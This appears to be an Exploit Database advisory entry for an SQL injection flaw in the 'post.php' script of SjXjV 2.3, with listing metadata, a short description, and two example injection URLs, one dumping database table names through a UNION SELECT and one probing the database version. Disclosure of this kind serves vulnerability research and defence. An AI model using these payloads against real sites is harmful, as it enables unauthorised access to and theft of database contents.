SjXjV 2.3 - 'post.php' SQL Injection

Author: 599eme Man
type: webapps
platform: php
port: 
date_added: 2011-10-28  
date_updated: 2015-03-04  
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 36269.txt  
source: https://www.securityfocus.com/bid/50426/info

SjXjV is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

SjXjV 2.3 is vulnerable; other versions may also be affected.

http://www.example.com/post.php?fid=41&tid=-51%20union%20select%201,2,3,4,5,6,7,8,group_concat%28table_name%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables+where+table_schema%20=database%28%29--

http://www.example.com/post.php?fid=41&tid=51 and substring(@@version,1,1)=5